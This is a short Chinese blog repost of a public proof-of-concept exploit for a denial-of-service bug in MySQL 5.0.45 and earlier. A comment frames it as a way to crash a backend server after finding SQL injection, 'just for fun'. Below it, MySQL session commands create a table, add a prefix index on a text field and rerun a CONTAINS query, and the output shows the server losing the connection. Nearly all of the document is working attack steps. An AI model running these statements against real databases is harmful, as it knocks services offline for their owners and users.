mysql 5.0.45 (修改)拒绝服务漏洞

  • A+
所属分类:数据库技术

mysql 5.0.45 (修改)拒绝服务漏洞的方法,追求安全的朋友可以参考下。
mysql 5.0.45 (修改)拒绝服务漏洞
/*
* MySQL <=6.0 possibly affected * Kristian Erik Hermansen * Credit: Joe Gallo * You must have Alter permissions to exploit this bug! * Scenario: You found SQL injection, but you want to punch backend server * in the nuts just for fun. Start with the Alter TABLE statement on * a table and field you know to exist. The first two SQL statements are * simply to demostrate reproducibility... */
mysql> Create TABLE `test` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
`foo` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
Query OK, 0 rows affected

mysql> Select * FROM test Where CONTAINS(foo, ''bar'');
Empty set

mysql> Alter TABLE test ADD INDEX (foo(100));
Query OK, 0 rows affected
Records: 0 Duplicates: 0 Warnings: 0

mysql> Select * FROM test Where CONTAINS(foo, ''bar'');
ERROR 2013 : Lost connection to MySQL server during query